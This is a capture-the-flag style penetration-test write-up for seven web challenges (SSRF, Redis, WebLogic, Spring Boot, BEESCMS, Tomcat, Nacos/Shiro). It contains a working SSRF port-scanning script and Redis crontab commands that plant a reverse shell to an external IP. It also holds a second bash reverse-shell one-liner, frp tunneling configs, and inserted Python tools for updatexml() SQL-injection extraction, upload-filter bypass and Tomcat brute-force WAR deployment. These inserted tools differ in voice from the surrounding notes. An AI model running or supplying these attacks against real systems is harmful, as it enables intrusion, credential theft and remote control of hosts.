Second-Round Interview Process Record

WEB1

FLAG1

Testing the site's functionality first: user input is not filtered, and the application will fetch arbitrary internal or external URLs, which points to SSRF.

External:

Internal:

Read the flag in the root directory with the file protocol: file:///flag

meetsec-web1{flag1-6d5e5c2bb397ba7727b58df59b35f66a}

FLAG2

Next, find the internal IP of the host behind the SSRF; the internal subnet is 172.18.240.0/24.

Snapshot of file:///etc/hosts:

127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.18.240.5 17b86b8e3c70

Write a Python script that probes internal services through the dict protocol:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Probe internal hosts and ports through the SSRF endpoint using dict:// URLs.
# Each probe submits one dict:// URL in the "url" form field and compares the
# response length with a baseline request to a port nobody listens on.

import requests

TARGET = "http://119.45.9.16"
HEADERS = {
    "Host": "119.45.9.16",
    "Cache-Control": "max-age=0",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Referer": "http://119.45.9.16/",
    "Connection": "keep-alive",
}
LAST_OCTETS = range(1, 256)
PORTS = [80, 443, 8080, 3306, 6379]


def fetch(url):
    """Submit one URL through the SSRF form; return the response length (0 on error)."""
    try:
        return len(requests.post(TARGET, headers=HEADERS, data={"url": url}, timeout=5).content)
    except requests.RequestException:
        return 0


def main():
    # Baseline: a closed port, so anything that answers differently is worth a look.
    baseline = fetch("dict://172.18.240.254:65535")
    print(f"Baseline response length: {baseline}\nStarting probe...\n")
    results = [
        (length, f"172.18.240.{octet}", port)
        for octet in LAST_OCTETS
        for port in PORTS
        if (length := fetch(f"dict://172.18.240.{octet}:{port}")) != baseline
    ]
    for length, ip, port in sorted(results, key=lambda x: x[0], reverse=True):
        print(f"[+] Possible internal service: {ip}:{port} response length = {length}")
    print("\nProbe complete.")


if __name__ == "__main__":
    main()

Results:

Found an unauthenticated Redis instance at 172.18.240.7:6379.

Got the flag.

FLAG3

Abuse Redis persistence: store a crontab entry as a value, point the RDB dump at the cron spool, and let cron execute the reverse shell. Each command below is sent through the SSRF form as a dict:// URL, like the probes above.

Flush existing data first so nothing else lands in the dump:

dict://172.18.240.7:6379/flushall

Store the reverse-shell crontab line as a value (the surrounding \n put it on its own line inside the binary RDB data):

dict://172.18.240.7:6379/set x "\n* * * * * bash -i >& /dev/tcp/8.148.81.154/1234 0>&1\n"

Change the persistence settings so the database file is written into the cron directory:

dict://172.18.240.7:6379/config set dir /var/spool/cron/
dict://172.18.240.7:6379/config set dbfilename root

This relies on Redis running as root on a CentOS-style host: there /var/spool/cron/root is root's crontab and cron skips the unparseable lines around the entry, while Debian-family cron keeps crontabs under /var/spool/cron/crontabs/ and rejects a file that contains the RDB binary data.

Trigger persistence, which writes the entry into /var/spool/cron/root:

dict://172.18.240.7:6379/save

Listen on the matching port on the attack server and wait for the shell:

nc -lvp 1234

Got the flag.

meetsec-web1{flag3-f22eec9fb7c498b3a747392ff53a746b}

WEB2

FLAG1

WebLogic framework.

Vulnerable.

Command execution with a tool; read the flag.

FLAG2

The challenge gives an internal network range, so other hosts are probably alive; upload a Godzilla (哥斯拉) webshell to look around.

Shell online.

Scan the 172.25.20.0/24 network for services.

Use frp to tunnel into the internal network.

First pop a reverse shell:

/bin/bash -c "/bin/bash -i >& /dev/tcp/8.148.81.154/1234 0>&1"

Start the frp server on the cloud host:

./frps -c ./frps.toml

Upload frpc and the edited frpc.toml to the target:

serverAddr = "8.148.81.154"
serverPort = 7000

[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "172.25.20.12"
localPort = 3306
remotePort = 6666

Tunnel the MySQL service through frp:

./frpc -c ./frpc.toml

WebLogic connects to the database through a JDBC data source, so the domain configuration holds the database user and an encrypted password.

The encryption key .dat file is under /root/Oracle/Middleware/user_projects/domains/base_domain/security/

Decrypt with it to recover the database password.

Connect to the database and get flag2.

meetsec-web2{flag2-9fffac75c84bfc66fef4998f3574c6c8}

FLAG3

sqlmap --os-shell on the database, got the flag.

meetsec-web2{flag3-2e947aef43be6dc428a9c626ba7fb824}

FLAG4

Scan the 172.16.10.0/24 network.

Tunnel the services on 172.16.10.1 through frp:

serverAddr = "8.148.81.154"
serverPort = 7000

[[proxies]]
name = "test-tcp-1"
type = "tcp"
localIP = "172.16.10.1"
localPort = 8082
remotePort = 8082

[[proxies]]
name = "test-tcp-2"
type = "tcp"
localIP = "172.16.10.1"
localPort = 8081
remotePort = 8081

[[proxies]]
name = "test-tcp-3"
type = "tcp"
localIP = "172.16.10.1"
localPort = 80
remotePort = 80

[[proxies]]
name = "test-tcp-4"
type = "tcp"
localIP = "172.16.10.1"
localPort = 7001
remotePort = 7001

[[proxies]]
name = "test-tcp-5"
type = "tcp"
localIP = "172.16.10.1"
localPort = 6349
remotePort = 6349

[[proxies]]
name = "test-tcp-6"
type = "tcp"
localIP = "172.16.10.1"
localPort = 8848
remotePort = 8848

The mapped services turn out to be the other Web1-7 challenges.

Scan the 172.26.30.0/24 network.

Tunnel the services on 172.26.30.1 through frp:

serverAddr = "8.148.81.154"
serverPort = 7000

[[proxies]]
name = "test-tcp-1"
type = "tcp"
localIP = "172.26.30.1"
localPort = 80
remotePort = 80

[[proxies]]
name = "test-tcp-2"
type = "tcp"
localIP = "172.26.30.1"
localPort = 6379
remotePort = 6379

[[proxies]]
name = "test-tcp-3"
type = "tcp"
localIP = "172.26.30.1"
localPort = 7001
remotePort = 7001

[[proxies]]
name = "test-tcp-4"
type = "tcp"
localIP = "172.26.30.1"
localPort = 8081
remotePort = 8081

[[proxies]]
name = "test-tcp-5"
type = "tcp"
localIP = "172.26.30.1"
localPort = 8082
remotePort = 8082

[[proxies]]
name = "test-tcp-6"
type = "tcp"
localIP = "172.26.30.1"
localPort = 8848
remotePort = 8848

Again, the mapped services are the other Web1-7 challenges.

WEB3

FLAG1

Spring Boot framework.

Got the first flag from the environment variables exposed by the env endpoint.

MySQL database.

DirSearch found the site's /heapdump endpoint.

JDumpSpider extracted the database username and password from the heap dump.

Connected to the database and got the flag.

meetsec-web3{flag2-9edbd4b03b5f86a9abe079bc63ea847b}

WEB4

FLAG1

BEESCMS.

Scanned paths.

Found a login page.

The login is SQL-injectable; calling updatexml() triggers an XPath parse error that leaks the username and password from the database.

Looked up the password hash.

File upload at http://119.45.9.16:8082/admin/upload.php; the check is bypassed by changing Content-Type to image/png.

Connected with AntSword (蚁剑) to http://119.45.9.16:8082/upload/img/202508152019431476.php and got the flag.

meetsec-web4{flag1-476e2dceb225678cd466fc3cd2b4c59c}
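The two BEESCMS steps in code, as an added example that is not the write-up's own: the updatexml() extraction paged past MySQL's 32-character XPath error limit, and the image/png Content-Type bypass on the upload. The login handler path, its field names, the table and column names in the subquery, and the "up" multipart field are placeholders; the upload URL is the one from the write-up. The credential string in the test is constructed.

```python
#!/usr/bin/env python3
"""updatexml() error-based extraction and the Content-Type upload bypass.

Assumptions: the login handler path and its field names, the table and column
names in the subquery, and the "up" multipart field are placeholders.
"""
import re
import requests

LOGIN_URL = "http://119.45.9.16:8082/admin/login.php"    # assumed
UPLOAD_URL = "http://119.45.9.16:8082/admin/upload.php"  # from the write-up
# MySQL shows at most 32 characters of the bad XPath expression; one of them is
# the '~' marker that forces the error, leaving 31 usable characters per query.
CHUNK = 31
LEAK_RE = re.compile(r"XPATH syntax error: '~(.*?)'")


def updatexml_payload(subquery, offset):
    """Injection that leaks CHUNK chars of `subquery`'s result from 1-based `offset`."""
    return (f"' and updatexml(1, concat(0x7e, (select substr(({subquery}), "
            f"{offset}, {CHUNK}))), 1) -- -")


def parse_leak(error_text):
    """The text between '~ and ' in the XPath error, or None if no error came back."""
    m = LEAK_RE.search(error_text)
    return m.group(1) if m else None


def extract(subquery, query_fn, max_len=512):
    """Page through the value CHUNK chars at a time; stop at the first short chunk.

    `query_fn(payload) -> response text` performs the request, so the paging
    logic is independent of HTTP and can be exercised against a fake.
    """
    out, offset = "", 1
    while offset <= max_len:
        leaked = parse_leak(query_fn(updatexml_payload(subquery, offset)))
        if leaked is None:
            break
        out += leaked
        if len(leaked) < CHUNK:
            break
        offset += CHUNK
    return out


def http_query(payload):
    """Send the payload in the (assumed) username field of the login form."""
    return requests.post(LOGIN_URL, data={"user": payload, "password": "x"},
                         timeout=10).text


def upload_php(filename, php_source):
    """The bypass from the write-up: a .php body declared as image/png."""
    files = {"up": (filename, php_source, "image/png")}
    return requests.post(UPLOAD_URL, files=files, timeout=10)


if __name__ == "__main__":
    creds = extract("select concat(admin_name, ':', admin_password) from bees_admin",
                    http_query)
    print("leaked:", creds)
```

A 32-character MD5 plus the username does not fit in one error message, which is why the loop moves the substr() offset instead of trusting a single response.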

WEB5

FLAG1

Apache Tomcat site.

There is a Tomcat Manager login; the Authorization request header is Username:Password Base64-encoded.

In Burp Intruder, define a custom iterator payload: position 1 is the username, position 2 the ':' character, position 3 the password, followed by a Base64-encode processing rule.

Brute-force to find the encoding of the correct Username:Password.

Decode it in CyberChef to get the credentials.

Log in to the backend.

There is a WAR deployment upload.

Generate a JSP webshell.

Zip it, rename the extension to .war, upload and deploy it on the site.

Connect to the shell.

Got the flag.

meetsec-web5{flag1-c7a8d2734ec5a4ed687a9a692ee733f8}
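The WEB5 procedure in code, as an added example that is not the write-up's own: building the Basic header the way the Intruder iterator did, decoding a hit, packaging a JSP as a WAR (a WAR is just a zip), and deploying it through the manager's text API. The candidate list, the manager port, the /manager/text path (which needs the manager-script role; the HTML form the write-up used needs manager-gui) and the harmless JSP in place of the webshell are all assumptions.

```python
#!/usr/bin/env python3
"""Tomcat Manager: Basic-auth brute force and WAR deployment.

Assumptions: a constructed wordlist, the manager port, the default
/manager/html and /manager/text paths, and a harmless JSP payload.
"""
import base64
import io
import zipfile
import requests

BASE_URL = "http://119.45.9.16:8081"   # host from the write-up; port is assumed
CANDIDATES = [("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "s3cret")]  # constructed


def basic_auth_value(user, password):
    """Exactly what the Intruder iterator produced: 'Basic ' + base64('user:pass')."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic(header_value):
    """Reverse of the above (the CyberChef step); returns (user, password)."""
    scheme, _, token = header_value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic header")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def brute_force(session, candidates):
    """Return the first (user, pass) the manager accepts, else None."""
    for user, password in candidates:
        r = session.get(f"{BASE_URL}/manager/html",
                        headers={"Authorization": basic_auth_value(user, password)},
                        timeout=10)
        if r.status_code == 200:   # 401 = wrong creds; 403 = right creds, wrong role
            return user, password
    return None


def build_war(entries):
    """A WAR is a zip; `entries` maps archive path -> file bytes. No web.xml is needed for JSPs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive paths inside a WAR (sanity check before uploading)."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        return sorted(zf.namelist())


def deploy_war(session, auth_header, context_path, war_bytes):
    """Deploy via the text API (PUT body = WAR); the HTML form does the same with multipart."""
    r = session.put(f"{BASE_URL}/manager/text/deploy",
                    params={"path": context_path, "update": "true"},
                    headers={"Authorization": auth_header,
                             "Content-Type": "application/octet-stream"},
                    data=war_bytes, timeout=30)
    return r.text.startswith("OK")   # Tomcat answers "OK - Deployed ..." or "FAIL - ..."


if __name__ == "__main__":
    s = requests.Session()
    creds = brute_force(s, CANDIDATES)
    if creds:
        jsp = b'<%= System.getProperty("user.name") %>'   # harmless stand-in for the webshell
        war = build_war({"index.jsp": jsp})
        print("deployed:", deploy_war(s, basic_auth_value(*creds), "/probe", war))
```

After deployment the JSP is reachable at BASE_URL + context_path + "/index.jsp"; the page's own flow used the HTML upload form instead of the text API, so the role requirement is the only practical difference.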

WEB6

FLAG1

nmap fingerprinting identified the service as Redis.

RCE with a tool.

meetsec-web6{flag1-672728e3bde3f4cc2b59de572b4df6d6}

WEB7

FLAG1

The first address, 119.45.9.16:8848, fingerprints as Nacos.

Visit the /nacos path and log in with the default credentials.

Look at the second address.

Shiro framework.

Back on the first address, found a leaked Shiro key.

RCE with a tool.

meetsec-web7{flag1-97fde43b8e55cb2e2b26b7c232ea82fa}